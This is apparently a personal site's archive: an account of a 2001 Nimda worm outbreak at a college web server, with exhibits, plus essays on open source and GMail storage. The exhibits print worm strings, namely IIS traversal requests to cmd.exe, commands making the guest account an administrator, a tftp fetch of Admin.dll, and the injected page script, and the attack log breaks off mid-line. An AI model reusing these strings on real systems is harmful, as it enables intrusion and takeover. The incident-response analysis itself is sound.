
December 22, 2004

When Things suddenly went wrong: w32.nimda.a@mm - Exhibits

Exhibits related to the Nimda attack at www.iimcal.ac.in


Exhibit A - CleanScript.pl (The script used to clean the infected files in the web site's directory hierarchy.)


#!/usr/bin/perl
# CleanScript.pl - walk the web site tree and strip the line the worm
# appended (the one that pops up readme.eml) from every infected file.
use strict;
use warnings;

# Change this to the starting point of your directory dump
my $dir = "/home/n_ravikiran/Website";

my $filecount = 0;

listdirectory($dir);

sub listdirectory
{
    my ($dir) = @_;

    # Skip anything we cannot open; ignore the . and .. entries
    opendir(my $dh, $dir) or return;
    my @entries = grep { $_ ne '.' && $_ ne '..' } readdir($dh);
    closedir($dh);

    foreach my $entry (@entries)
    {
        my $path = "$dir/$entry";
        if (-d $path)
        {
            listdirectory($path);    # recurse into subdirectories
        }
        else
        {
            processnames($path);     # clean regular files in place
        }
    }
}

sub processnames
{
    my ($file) = @_;
    $filecount++;

    # Read the whole file, then rewrite it without the infected lines
    open(my $fh, '<', $file) or return;
    my @totalFile = <$fh>;
    close($fh);

    open($fh, '>', $file) or return;
    foreach my $line (@totalFile)
    {
        if ($line =~ /readme\.eml/)
        {
            print $line;             # echo the line being dropped
        }
        else
        {
            print $fh $line;
        }
    }
    close($fh);

    print "$filecount $file\n";
}


Exhibit B - Interesting Strings


a) Some Registry Entries.


System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China


b) The header of the mail file. Note that the content type
is declared as audio/x-wav ;) the neat trick used to deliver an
executable file. The attached file itself is called readme.exe.


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
--====_ABC1234567890DEF_====

c) Some more beautiful ideas. The hiding mechanism of
the virus, in case cleaning is attempted from the DOS prompt or
otherwise, and the entries that cause the system to 'update' the
machine with the virus at boot time.

NUL=
[rename]
\wininit.ini

d) Payload attack method. Notice the enabling of file sharing,
then the Administrator access granted to the guest account, and
the hiding of file extensions. (The reason for the last is
wonderful: readme.exe comes with an icon that looks like IE's
icon for HTML files, the familiar 'e'. If extensions were
displayed, this method of inducing users to execute the file would fail.)

Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
\\%s
%ld %ld %ld
%ld %ld

e) On NT, hiding and maybe a timebomb? Note the counter...

ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib

f) NT again. The attack on IIS is carried out using these request strings.

/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll

g) The string added to web pages for delivery of the payload. This started it all.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no,top=6000,left=6000")</script></html>
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close

h) Unknown agenda of the payload. WinZip itself is not infected,
says Symantec. The DLL that is infected (riched20.dll) prevents
Word, or any editor that uses it, from working properly. Also the
string that goes into the system.ini file.

readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
.exe
dontrunold

i) Some references that show the work that the payload does on the user side.

gethostbyname
gethostname
sendto
send
recvfrom
recv

MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL

Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet

j) Some more Registry Entries

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT


Exhibit C - Nimda Attack Sequence

The following lines are from the logs of attacks on the Linux machine by one particular IIS server. Although our own IIS server fell to the first of these attacks, the Linux server has been braving the blizzard all along. True, the worm cannot hit it, but the feeling of safety is great all the same. Initially the attacks were restricted to 203.x addresses, but now they are coming from all sorts of IP ranges. Another thing to note is that the attacks have become particularly persistent against this machine, while the patched IIS server was subsequently left alone. It seems the choice of target is not entirely random.

203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 292 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 290 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 300 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 331 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:29 +0530] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 313 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 400 297 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 314 "-" "-"
203.197.64.3 - - [21/Sep/2001:16:38:30 +0530] "GET /scripts/..%252

November 22, 2004

The Philosophy of the Free & Open

And how it impacts us.

Open Source is not about Linux. It is not about Apache [1], mySQL [2] or GNOME [3]. In fact, it is not about software at all. Rather it is a philosophy and a belief. A belief that is not only old, but rather clichéd, and goes – “The pen is mightier than the sword”.

The Internet has breathed a new life into this saying, granting it an awesome power. Power enough, that a few individuals, scattered across vast distances, armed with nothing but knowledge, are now planning world-domination.

This article is an idle walk down the annals of history and the corridors of philosophy [4], to play with the questions “who” and “why”. Who are these people, and why-o-why are they doing what they are doing.

Free as in Freedom

The words “free software” or “open source” typically evoke responses saying, “It is available without charge”. While true, it is a quirk with the English language [5] that prevents us from seeing the other, truer meaning. English uses the same word “free” to denote both “without a price to pay” and “freedom to do what you wish to do”. It is the second meaning that truly symbolizes all that this movement stands for. The interpretation of this freedom makes one appreciate that this philosophy is not restricted to software at all. It in fact extends a lot wider.

Imagine a bunch of kids given a huge white canvas, spotlessly clean, and spray cans of red paint. More often than not, the kids will spray away randomly on the canvas. What if, instead, the kids sat down and started to painstakingly detail the verses of the Iliad or the Ramayana? This seems inconceivable, because human nature apparently prefers the playful to the ordered, a preference amplified to an extreme in a group. Directing a random group without either a stick or a carrot seems impossible.

However this impossibility is precisely what is manifesting over at Wikipedia [6]. Wikipedia is an “Open Encyclopedia” where anyone can contribute to any article, without even being logged in. Furthermore, any change perpetrated is visible instantly on the web, without being checked, corrected or in any other fashion moderated by anyone. Given this absolute freedom you would assume chaos – errors in content, clumsiness, information biases, ineptitude or plain vanilla vandalism. However the Wikipedia is one of the web’s most searched encyclopedias, channeling the expertise of thousands to millions more.

Slashdot [7] is another example of this channeled freedom. Despite its obvious biases and pedigree, it remains by far the best example of a publicly moderated discussion board.

The philosophy that drives a hacker of Linux is the same one that drives a contributor to Wikipedia. Freedom is not always a bad thing. It does not always result in chaos; it begets responsibility and motivates productivity. This freedom is a core tenet of the philosophy of the Open Source movement. I could go on with other examples of the newsgroups [8] or the open courseware [9], but that would be unnecessary. Instead let's spend time tracing the roots of the free and open source philosophy.

In the beginning was the command line

With apologies to Neal Stephenson [10], we are talking about a time that was not too long ago. About three decades ago, the computer meant the PDP-10 [11] or a teletype-fed mainframe. Programming was about thinking in bits and bytes, while programs were meant to be shared, understood, debated upon and improved. Out of thin air and using 0s and 1s, a new science was being invented. C and C++ [12] were being developed, Unix was being coded [13] and software and hardware standards were being set.

The times were reminiscent of the Wild West, with its own tight-knit groups, raw excitement and brave gun-wielding heroes. The difference was that the program now replaced the gun and the mainframe was the battlefield. It was this arena that the corporation was now entering. With a promise to take computing to the masses, companies were doing something that was unacceptable to the pioneers – “selling” software.

Richard Stallman [14] was an early pioneer. He believed that software was a universal tool and the source was its soul. Closing source or selling software was utterly unacceptable to him. And he was prepared to do something about it. In 1984, the same year Apple Computer released the Macintosh, Stallman launched the GNU Project [15].

GNU stands for GNU’s Not Unix; its vision, somewhat ironically, was to provide a full, free version of UNIX. In 1984, UNIX was the predominant OS and was available in a mind-boggling variety of commercial flavors, each fragmented from and incompatible with the others. The Personal Computer as a product was almost non-existent then, and as a concept was still a joke. GNU therefore sought to “liberate” the entire computing world by providing the fundamental tool – the Unix OS – for free.

UNIX-like operating systems are built of two basic parts – the kernel and the utilities. The kernel is the core, which handles the very low-level interactions with the hardware, memory and the processor. It provides only very basic functionality, which is turned into something useful by the utilities. UNIX, by virtue of its rich heritage, has a multitude of tools for every activity from network management to text processing.

While some members of the GNU Project started recreating the rich toolset, others started work on the kernel, called the HURD [16]. In time the tools started rolling out, each free, available with source, and providing functionality similar to or better than that of the various commercial Unices. The development of the kernel, however, was heading nowhere. The late 1980s saw the advent [17] of the true Personal Computer – cheap Intel hardware running DOS or the early Windows.

Without a kernel, and with the mainframe a rapidly dying breed unable to survive the onslaught of the PC, the GNU movement suddenly faced irrelevance.

In 1991, Linus Torvalds, a 21-year-old computer science student at the University of Helsinki, decided that Minix, the Unix-look-alike operating system running on his personal computer, was not good enough. He was pretty sure he could write something better and attempted to code his own. But in doing this he turned to the Internet for help and guidance [18]. He also put the source code of his attempts back on the net for comments and corrections. And from this sprang the kernel we now know as Linux. Linux as a kernel could run on the same contemporary hardware used by DOS and Windows. Further, being based on the same standards as the older UNIX, Linux could run programs written for the older UNIX kernels.

For GNU, this meant that their long wait for a free kernel was finally over. For Linux this meant that it finally had programs that could actually utilize the kernel that was being built. GNU/Linux became the complete ‘free’ operating system that Richard Stallman and a number of others had been dreaming of.

On the shoulders of Giants

It is people who ultimately define the success of any idea. So it is with the idea of the “open”. Among the multitude of programmers, users, fans and followers of the free and open source movements, there are some who have helped define the soul of the FOSS movement. There are some like Richard Stallman, who are fanatically devoted to the idea of free software, while others like Linus Torvalds, have been the silent, media-shy icons of the movement. There however are others who have helped give a more balanced view of the philosophy of FOSS.

Eric S. Raymond is a Linux evangelist and the author of three extremely powerful essays [19] on the philosophy of Free and Open Source. Called “The Cathedral and the Bazaar”, “Homesteading the Noosphere” and “The Magic Cauldron”, these essays present a very logical account of the FOSS philosophy. They discuss the social, economic and personal drives, reasons and justifications for the success of the open approach. Bruce Perens is another Linux advocate, whose article “The Open Source Definition” [20] is a fundamental account of the principles of the FOSS camp. These essays explore the novel effect of having loosely bound, part-time volunteers drive projects of unimaginable magnitude and then give it all away for free.

One notable side effect of having such a diverse and widespread fan base is that villains are instantly vilified and secrets don’t remain secret for long. Take the example of the famous “Halloween Documents” [21].

Microsoft, during Halloween 1998, commissioned an internal strategy memorandum on its responses to the Linux/Open Source phenomenon. Unfortunately for Microsoft, it leaked, and within days it was all over the Internet, being taken apart by numerous FOSS advocates. Microsoft had always been acknowledged as the party most directly affected by FOSS, but until then it had been more of a cold war. The Halloween documents changed all that. Open Source advocates openly condemned Microsoft. Microsoft slowly started realizing that FOSS was rapidly changing from a fringe movement into something that directly threatened it. It responded by sowing what is now known as FUD (Fear, Uncertainty and Doubt) in the minds of its customers. For the first time Microsoft directly acknowledged [22] that Linux had the capacity to unseat it, and started attacking the fundamental value propositions [23] of Linux and the FOSS.

It was also around this time that the mainstream press started increasing its coverage of FOSS. The coverage was initially about Linux, the free replacement for Unix. Then it was about the sustainability of Open Source as a business model. And lately it is about David vs. Goliath – FOSS vs. Microsoft.

The press is an expression of popular opinion. Equally, the press forms popular opinion. And popular opinion, therefore, leans heavily toward portraying FOSS as the David in this David vs. Goliath story.

This is where we come in

As long as we restrict our view of the FOSS movement to the software it generates, this popular opinion seems perfectly reasonable. However, once we realize that the philosophy of FOSS extends beyond the mere products of the movement, we begin to see the nature of our relationship with it. At no great risk of generalization, the spirit and philosophy of FOSS is nothing short of that of the Internet itself.

The philosophy of FOSS is about freedom, freedom defined as “libre” – a lack of constraints. It is a spirit of sharing and collaboration. It is a spirit that places quality above other considerations. It is a spirit that drives, and is driven by, a free flow of ideas. It is a philosophy that considers information supreme.

Every time we search the Internet for tips we are appealing to the philosophy of Open Source. Every code snippet, article, comparative analysis, forum on the Internet is driven by this philosophy. Every self-taught computer user is a product of the philosophy of the Open Source.

To consider this movement and the change it entails as anything less than mammoth would be childish. It involves a fundamental shift in our perception of the business of Information Technology itself. However, the change is upon us. It is now up to us to either respond proactively or to passively let events take the lead in changing us.

References

[1] http://www.apache.org/
[2] http://www.mysql.com/
[3] http://www.gnome.org/
[4] http://www.gnu.org/philosophy/philosophy.html
[5] http://www.gnu.org/philosophy/categories.html#FreeSoftware
[6] http://www.wikipedia.org/
[7] http://slashdot.org/
[8] http://groups.google.com/
[9] http://ocw.mit.edu/index.html
[10] http://www.cryptonomicon.com/beginning.html
[11] http://en.wikipedia.org/wiki/PDP-10
[12] http://www.research.att.com/~bs/C++.html
[13] http://www.bell-labs.com/history/unix/
[14] http://www.stallman.org/
[15] http://www.gnu.org/
[16] http://www.gnu.org/software/hurd/hurd.html
[17] http://www.geocities.com/n_ravikiran/write008.htm
[18] http://www.geocities.com/n_ravikiran/write003a.htm
[19] http://www.catb.org/~esr/writings/cathedral-bazaar/
[20] http://perens.com/Articles/OSD.html
[21] http://www.opensource.org/halloween/
[22] http://news.com.com/2100-1001_3-253320.html
[23] http://www.microsoft.com/mscorp/facts/default.asp

Document Changes
November, 22, 2004: First published version.

The gig for the Gigabyte

And how GMail might become just another free email provider

GMail seems to have opened the floodgates for email storage. And while it is still in its beta stage, quite a few other free email providers are threatening to take away the crucial popular advantage that GMail seems to offer.

We will look at the issue in two sections - first we will try to understand the big ado about the 1 GB email service. Then we will look at how this affects GMail.

The Gigabyte fallacy

Ever since GMail came out with its email-for-life offer, everyone seems to be falling head over heels telling everyone else that 1 GB of email space is good - in other words, that we all need 1 GB of email storage. Though 1 GB is good, it is like the offer at your favourite restaurant - "Eat all that you can and pay your usual". The problem with such an offer is this - you cannot eat more just because it is available.

Email users are typically of three types - the desktop user, the home user and the kiosk user. These are non-standard terms, relevant only to this article.

The desktop user is a user who does not use webmail. He has a desktop email client and uses a service provider to connect to. We assume that this user is one of the heaviest users of email.

The home user connects to the Internet using a personal/dedicated machine and has local disk storage available even without Internet connectivity. This user uses webmail and is typically a lighter user than the desktop user.

The kiosk user is a user who works from a public machine and a public connection. Such a user does not own any disk space and cannot access any data without live Internet connectivity.

Let's look at how long it takes each of these users to rack up 1000 MB, or 1 GB, in their email accounts. We assume that a desktop user typically adds 1 GB every year to the size of his inbox. Accounting for usage that is not dedicated to email, and to err on the conservative side, this works out to about 400 KB every hour. We assume that a home user is half as active in using email and a kiosk user one-fourth as active. This means that a home user takes about 4.6 years to rack up a GB, while a kiosk user takes 16 years.

Profile         Usage factor   Hours/week   MB/week   Weeks to 1 GB   Years
Desktop user    1              45           18        55.5            1
Home user       0.5            21           4.2       238             4.6
Kiosk user      0.25           12           1.2       833             16

Assuming a 1:3 split between home users and kiosk users among webmail subscribers, we have, on average, 13.2 years for users to hit their 1 GB mark. A lot can happen during this time. More importantly, this means that the webmail provider has to grow the inbox by only about 75 MB per subscriber per year, and need not gear up to 1000 MB anytime in the near future.
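For anyone who wants to play with these assumptions, here is a minimal Perl sketch of the same back-of-the-envelope calculation. The 0.4 MB/hour baseline, the hours-per-week figures and the 1:3 split are the assumptions from the table above, not measured data.

#!/usr/bin/perl
# Back-of-the-envelope sketch of the table above. The 0.4 MB/hour
# baseline and the hours/week figures are assumptions, not measurements.
use strict;
use warnings;

my $mb_per_hour = 0.4;    # desktop baseline: ~400 KB of new mail per active hour
my %profiles = (
    'Desktop user' => { factor => 1.00, hours => 45 },
    'Home user'    => { factor => 0.50, hours => 21 },
    'Kiosk user'   => { factor => 0.25, hours => 12 },
);

for my $name (sort keys %profiles) {
    my $p       = $profiles{$name};
    my $mb_week = $mb_per_hour * $p->{hours} * $p->{factor};
    my $weeks   = 1000 / $mb_week;          # weeks to fill 1000 MB
    printf "%-12s %5.1f MB/week  %6.1f weeks  %4.1f years\n",
           $name, $mb_week, $weeks, $weeks / 52;
}

# Weighted average for a 1:3 home:kiosk split of webmail users
my $home_years  = 1000 / (0.4 * 21 * 0.50) / 52;
my $kiosk_years = 1000 / (0.4 * 12 * 0.25) / 52;
my $avg_years   = 0.25 * $home_years + 0.75 * $kiosk_years;
printf "Average time to 1 GB: %.1f years (~%.1f MB per subscriber per year)\n",
       $avg_years, 1000 / $avg_years;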

In short, the Gigabyte is not as huge as it is made out to be. Actual usage might be a lot less than even these numbers suggest. There is hence little that is actually different about the Gigabyte rush.

The one thing that could severely change these numbers is a shift in usage patterns - say, if GMail becomes the next big file-sharing network. Even then, as long as the bottleneck is the network and not storage, things might not change all that much.

Document Changes
November, 22, 2004: First published version.

When Things suddenly went wrong: w32.nimda.a@mm

The attack of the worm and the response.

This is a description of the Nimda virus attack on the official web site of Indian Institute of Management, Calcutta, on 18th September, 2001 and the subsequent response by the student system administrator team.

I was in my room, preparing for a course submission two days away, when the first alarm trickled down to me. I was struggling with a VB project, with Megadeth having sole control of my ear drums, when my neighbor Vipul interrupted me. He was pretty incomprehensible at first, but slowly it dawned on me that I was supposed to log onto the institute web site.

As soon as I logged onto the site I knew something was wrong. We had left it safe and sound not more than two hours ago. But now, as soon as the page came up, a second window popped up and requested the download of a "readme.eml" file. I knew that eml files were used by Outlook and Outlook Express to save emails. I hoped against hope that the eml file had something to do with my open Outlook, but very soon I was disabused.

I opened a second page on the web site, which also resulted in the pop up and download of the same "readme.eml" file. Twice was definitely no coincidence. Fighting that sinking feeling, my hope B was that the site may have been hacked or was under attack. I had to look for something either confirming or denying this hypothesis. And the only clue I had was the eml file. Using Outlook to figure out the contents of the file showed me that there was indeed an executable file "readme.exe" as an attachment within the eml file.

The existence of the attachment caused a variety of alarm bells to go off in unison. Firstly, it definitely looked like a virus, and secondly, it was propagating from the web site and not via email. That morning, I had read about another variant of the 'code red' virus that was reportedly ready to start doing damage. Fearing the worst, my next steps were clear - I had to be at the server room physically, not in my room trying to do anything remotely. I called Vipul to join me and hurried to the main server room.

Why I was spared

Thinking back, it was pretty reckless of me to try to get to the details of the eml file in my room. But I eventually escaped infection - by nothing more than pure luck. A few days ago, my computer had been unceremoniously powered off a number of times by the Electricity corporation of West Bengal forcing me to reinstall Windows. As a result of this I ended up downgrading my Internet Explorer from the newer 5.5 version to the default 5 version that came bundled with Win98. As we will see later, the reinstall was a blessing in disguise. If this had not been the case, I would have been cleaning my own machine and saving my VB projects, instead of being free to work on just the main server.

The Server room

I was greeted at the server room by an extremely sluggish main server. This was a Compaq Proliant ML 350 running Windows NT 4. It took more than two minutes just to get to the logon screen. And all the while I could clearly see the hard drive thrashing. I was sorely tempted to switch off the machine and get it offline so that I could safely start it back up to see what damage had been done. But knowing nothing more about what was happening or the cause, I was reluctant to take any drastic measures. I continued to try to get the machine back in control.

By the time I finally got to the shell, there was hardly anything left of it. Explorer was dying intermittently and Dr. Watson (the crash recovery program on NT) was spawning all over the place. Then I found the one tool that differentiated the NT line from Windows 9x - the Task Manager. Quickly I brought it up and killed off the erring Explorer and all the well-meaning Dr. Watsons. Switching to the process list I saw dozens of running processes called 'net'. As far as I knew, there should have been none. Meanwhile, there was no let up for the hard disk and the machine was barely responsive. In the next few minutes I slaughtered as many of the unnecessary processes as I could lay my mouse on, and when I found the machine a tad quicker, sent it for a shutdown. Amidst screaming new processes the server went down.

Once I had the server down, there was a sense of peace. At least no further damage could be done. But God only knew what damage had already been done. At this point, I was still trying to convince myself that the whole thing was a hack of some kind, given the many 'net' processes and my ignorance. Yanking off the cable connecting the server I started it back in VGA mode, which was not even a safe mode, but hopefully would allow me to poke around. Dear old Explorer and Dr.Watson were up to the same antics as before. I killed each in turn and finally managed a stable Explorer as long as no one was double clicking programs.

When I finally got to the root directory and opened the default.asp file I saw that very wonderful line I would see over and over again over the next few days.

<html><script language="JavaScript">window.open("readme.eml",null, "resizable=no, top=6000, left=6000")</script></html>

What it did was what we had seen when accessing the site - it downloaded the file "readme.eml" onto the computer of anyone who happened to load the page. The file "readme.eml" was of course present in the directory. A quick check showed that the default pages in each of the subdirectories were similarly changed, and the "readme.eml" file was present in all of them too.

If there was a need for confirmation, this was it. It seemed less and less like a hacker and more and more like a script from a virus or a worm. And I realized that I needed to talk to someone with ideas. We were already trawling the anti-virus sites, trying to see if they had any news. Meanwhile, I went looking for help.

Trying to find help in the campus, my worst fears came true. Across the campus, computers were behaving strangely, MS Word was not saving, and some machines wouldn't even boot. The story was remarkably the same everywhere.

"Oh yeah, I did double click on that readme letter, and now it keeps popping up a warning message with 'OK' 'Details>>' buttons."

"I ran a live update yesterday and Norton at the moment does not detect any viruses."

"Every time I reboot things are becoming more and more difficult.".

The main server was down, and I had no luck in finding anyone who had more experience with it. Sometime around this time, handwritten notices were put up across the campus urging students not to click on any files that said readme or looked like a letter.

What the hell is it?

Back alone in the server room I restarted the server, and this time it was tougher controlling Explorer and its buddy Dr. Watson. Finally I killed both of them and started browsing using the command shell. Then I spent time figuring out where the actual executables of the various programs in the Start menu were, and started all the monitors and the mmc console that I needed. Then came another crackdown on the various processes that I felt were unnecessary, including the HTTP and FTP servers. Now I needed more information.

Before we continue, a quick look at the setup we have at IIM Calcutta. We have an intranet of about 400 student machines, and more including those of the professors. All are connected to the Internet through two proxies - one Novell and one Linux. The (affected) web server is not connected to the internal network directly. Apart from the two proxies there was a third machine running Linux (Red Hat 7.1) that also had two network cards, connected to both the intranet and the Internet. This was a temporary pilot server located next to the main web server, and it formed the hub of repair activities over the next 35 hours. Presently the machine was being used to poll the web sites of Norton and McAfee, with little to show for it. Further searching by Vipul yielded the same result - nothing on this, yet.

In time we assembled a team that would be responsible not only for getting the main server up but also for ridding the entire extranet of the virus. With the team came experience and more ideas. Back on the main server, the first readme.eml was created at 6:55 p.m. This was the time when the first of the default.asp files were last modified. Vipul's call to me had come about an hour later, so the web server was online for a whole hour with the virus doing whatever it was supposed to do. We also discovered that all files named default or index had been modified over a period of 6-7 minutes starting 6:55 p.m., pointing to the involvement of a remote script - no script run on the same machine would have taken so long. Also, files not linked to from the main web site (like indexold.asp) were affected. All fingers now pointed to an external infection through the IIS web server, similar to Code Red.
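As an aside, this modification-time evidence can be reconstructed with a few lines of Perl. The sketch below is a hedged illustration, not the exact commands used that night, and the web root path is only an assumption.

#!/usr/bin/perl
# Sketch: list files under the web root in order of modification time,
# to reconstruct the 6-7 minute window in which the worm rewrote pages.
use strict;
use warnings;
use File::Find;
use POSIX qw(strftime);

my $root = shift || '/home/n_ravikiran/Website';   # assumed path
my @files;

# Collect (full path, mtime) pairs for every regular file
find(sub { push @files, [ $File::Find::name, (stat $_)[9] ] if -f $_ }, $root);

# Print them sorted by modification time
for my $f (sort { $a->[1] <=> $b->[1] } @files) {
    print strftime("%Y-%m-%d %H:%M:%S", localtime $f->[1]), "  $f->[0]\n";
}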

With no further word from the anti-virus sites (so we thought) and a pathetically crippled system, most of us realized that this was not going to be a quick delete-and-change-passwords recovery. Also, reports were trickling in that the virus was rampant across the extranet. All drives were being put on active share, and machines on the network with any sort of write permissions were being promptly written into. Looking at the way the payload was working, machines needed to be isolated. Taking a quick decision, all the routers in the student section were manually switched off and the student section summarily went offline.

It was already late in the night and there was still no word from the anti-virus sites. Just to be sure, we got a copy of the readme.eml file and ran checks on it with all the latest anti-virus packages available. None saw anything wrong with the file - not exactly in line with what the rest of the student machines were seeing. Then I got probably the last brain wave before my brain shut down for the period - Slashdot. And sure enough, it was the third article, posted a while back, with links. Now we had a name, nay two: Nimda and Minda. Things were checking out and the worst fears were there in black and white. By then it was quite late in the night, around 2:00 a.m., and there was one update posted by McAfee and none by Symantec. Our extranet ran on Norton, so things did not look any better. We decided to keep the routers down and the site offline till further notice. Now began the damage control exercises.

Damage Control

As is the case with any other network, the first need was to assure the populace that the steps taken were not to deprive them of network usage but to protect them. Official notices went out detailing what had happened and what needed to be done. A temporary deadline of 10 a.m. was also communicated, before which we would not consider getting the network back online. There was more damage control to be done. With a campus as dependent as ours on the network, communication suddenly ground to a halt. The summer placement process came to a halt. Rumors were rampant, with many quotes attributed to the team handling the crisis. Most had to be countered and the record set straight. Then of course we had to assure all those who were infected that things would be fine and tomorrow would be a better day.

'Tomorrow', just a few hours later, was not a better day. The McAfee update proved to be useless - this after uninstalling Norton from a number of affected machines, installing McAfee, updating it, running system-wide scans and deleting many of the affected files.

Almost 14 hours into the attack and we hadn't made much progress. The deadline for keeping the routers down was extended to 6:00 p.m. that evening and more notices were printed. Norton was quiet and we had to wait. But in the meantime things did get better, as more and more information became available and we also got some cleaning underway. The main advantage we had was the Linux machine on the network. We could get some parts of the plan into action.

The last backups we had of the entire web site were hopelessly out of date. So we got the infected site zipped up and ftp'ed over into the Linux machine. Ditto the database. Along went copies of the readme.eml file and the readme.exe file.

Information and Modus operandi

Running strings on the executable file was very informative. The strings program basically looks through an entire file and prints out the ASCII strings embedded in it. For example, if you write a program that prints "Hello World" and make it into an executable, then strings run on that executable will print this string out, amongst others. Some excerpts of what we found are given in Exhibit B. Don't worry about understanding all of it; we did not either. But it definitely gave us some clues about the way this virus worked. Most of what we found was further validated by others in the security business. You can check the other sources out by browsing through the links below.
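For the curious, the essence of strings can be sketched in a few lines of Perl. This is only an illustration of the idea, not the real binutils implementation, and readme.exe is just an example file name.

#!/usr/bin/perl
# Minimal sketch of what the Unix 'strings' utility does: read a binary
# file and print every run of 4 or more printable ASCII characters.
# Usage (example): perl ministrings.pl readme.exe
use strict;
use warnings;

my $file = shift or die "usage: $0 <binary>\n";
open my $fh, '<:raw', $file or die "cannot open $file: $!\n";
local $/;                    # slurp the whole file at once
my $data = <$fh>;
close $fh;

# Print each run of printable characters on its own line
while ($data =~ /([\x20-\x7e]{4,})/g) {
    print "$1\n";
}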

